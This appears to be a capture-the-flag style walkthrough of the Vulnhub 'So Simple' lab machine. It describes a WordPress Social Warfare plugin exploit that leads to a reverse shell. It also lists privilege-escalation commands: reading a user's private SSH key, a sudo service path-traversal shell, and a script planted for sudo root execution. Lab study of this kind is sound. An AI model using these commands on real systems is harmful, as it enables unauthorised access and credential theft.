Introduction

In this video walkthrough, we demonstrated how vulnerable WordPress plugins would lead to a complete system compromise. We then escalated our privileges by taking advantage of security misconfigurations in the permissions. We used So simple box from Vulnhub for this walkthrough.

Finding the Vulnerability

First, I started by scanning the target machine’s WordPress installation. The scan flagged two outdated plugins: Social Warfare and Simple Card Solution. I decided to focus on Social Warfare because a quick search revealed a critical remote code execution exploit for a version very close to the one on the target.

Gaining Initial Access

With the exploit in hand, I created a payload file designed to read the /etc/passwd file. I then triggered this payload by visiting a specially crafted URL. Success! The contents of the /etc/passwd file were displayed in my browser.

Next, I modified the payload to establish a reverse shell connection back to my machine. I set up a Netcat listener on my end and, by revisiting the crafted URL, I was able to get a limited shell on the target machine.

Escalating Privileges

Now for the fun part: escalating my privileges.

  1. From Limited Shell to User “Max”: My initial shell was pretty restricted. I navigated to the /home directory and found two users: “max” and “steven”. After some digging in “max”‘s home directory, I found his .ssh directory and, within it, his private key (id_rsa). Using this key, I was able to SSH into the machine as “max”, giving me a much more stable and flexible shell.
  2. From User “Max” to User “Steven”: As “max”, I checked what commands I could run with sudo. It turned out I could run a service as the user “steven”. By running a specific command, I was able to spawn a shell as “steven”.
  3. From User “Steven” to Root: One final privilege escalation was needed. As “steven”, I again checked my sudo permissions and found that I could run a script as root without a password. The script didn’t exist, so I created it, gave it execute permissions, and then ran it with sudo. And just like that, I had full root access to the machine! 👑

Technical Commands Used

Here are the commands I used in the terminal throughout this process:

  • ls
  • cd home
  • cd max
  • cat user
  • ls -la
  • cd .ssh
  • cat id_rsa
  • ssh -i id_rsa max@192.168.1.56
  • sudo -l
  • sudo -u steven /sbin/service ../../bin/bash
  • cd /opt
  • mkdir tools
  • cd tools
  • nano server-health.sh
  • chmod +x server-health.sh
  • sudo -u root /opt/tools/server-health.sh

Video Walk-through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles